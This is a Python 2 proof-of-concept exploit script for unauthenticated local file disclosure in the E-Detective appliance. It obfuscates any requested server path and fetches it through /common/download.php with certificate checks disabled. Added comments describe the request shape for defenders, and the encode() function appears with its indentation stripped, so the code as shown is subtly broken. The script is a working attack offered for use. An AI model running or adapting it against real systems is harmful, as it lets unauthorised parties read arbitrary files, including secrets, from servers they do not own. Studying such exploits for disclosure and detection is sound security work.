# Proof-of-concept for unauthenticated LFD (local file disclosure) in E-Detective.
# Authors: Mustafa Al-Bassam (https://musalbas.com)
# slipstream/RoL (https://twitter.com/TheWack0lian)
import argparse
import base64
import urllib2
import ssl
# TLS context shared by http_read(). Certificate and hostname verification are
# both switched off, so the peer is not authenticated and responses can be
# observed or altered in transit.
# NOTE(review): presumably done because the target presents a certificate that
# does not validate; the authors do not say. Confirm before reusing this.
ctx = ssl.create_default_context()
# check_hostname must be cleared before verify_mode is set to CERT_NONE; the
# ssl module raises ValueError otherwise, so keep these two lines in this order.
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
def display_banner():
    """Print the authors' ASCII-art banner to stdout.

    Uses the Python 2 print statement, like the rest of this script.
    """
    # NOTE(review): the art's leading whitespace looks stripped in this copy;
    # the string below is kept exactly as it appears here.
    print """
_
| |
_ ____ ___ __ ___ __| |______
| '_ \ \ /\ / / '_ \ / _ \/ _` |______|
| |_) \ V V /| | | | __/ (_| |
| .__/ \_/\_/ |_| |_|\___|\__,_|
| |
|_|
_ _ _ _
| | | | | | (_)
__| | ___| |_ ___ ___| |_ ___ _____
/ _` |/ _ \ __/ _ \/ __| __| \ \ / / _ \\
| (_| | __/ || __/ (__| |_| |\ V / __/
\__,_|\___|\__\___|\___|\__|_| \_/ \___|
"""
# Command-line interface: two required positionals, consumed by the
# __main__ block as args.hostname and args.file.
argparser = argparse.ArgumentParser(
    description='Proof-of-concept for unauthenticated LFD in E-Detective.',
)
for _name, _help in (
    ('hostname', 'hostname to pwn'),
    ('file', 'path to file on server to grab'),
):
    argparser.add_argument(_name, help=_help)
# Drop the loop variables so the module namespace matches the original.
del _name, _help
def encode(text):
encoded = ''
for i in range(len(text)):
encoded += chr(ord(text[i]) + 40)
encoded = base64.b64encode(encoded)
return encoded
def poc(hostname, file):
    """Request *file* from *hostname* via /common/download.php and return the body.

    The path is sent in the ``file`` query parameter after encode(); no
    credentials, cookies or session are attached to the request.

    For defenders: GET requests to /common/download.php carrying a base64
    ``file`` value from clients with no authenticated session are the
    request shape this script produces, and are what to look for in the
    appliance's web logs.
    """
    obfuscated_path = encode(file)
    url = 'https://' + hostname + '/common/download.php?file=' + obfuscated_path
    return http_read(url)
def http_read(url):
    """Fetch *url* with a GET request and return the raw response body.

    Uses the module-level ``ctx``, which has certificate and hostname
    verification disabled, so the server's identity is not checked.
    No timeout is passed to urlopen(), and urllib2 errors propagate to
    the caller unchanged.
    """
    response = urllib2.urlopen(url, context=ctx)
    return response.read()
if __name__ == "__main__":
    # The banner is printed before argument parsing, so it appears even when
    # argparse exits with a usage error.
    display_banner()
    cli_args = argparser.parse_args()
    # Python 2 print statement: writes the response body to stdout.
    print poc(cli_args.hostname, cli_args.file)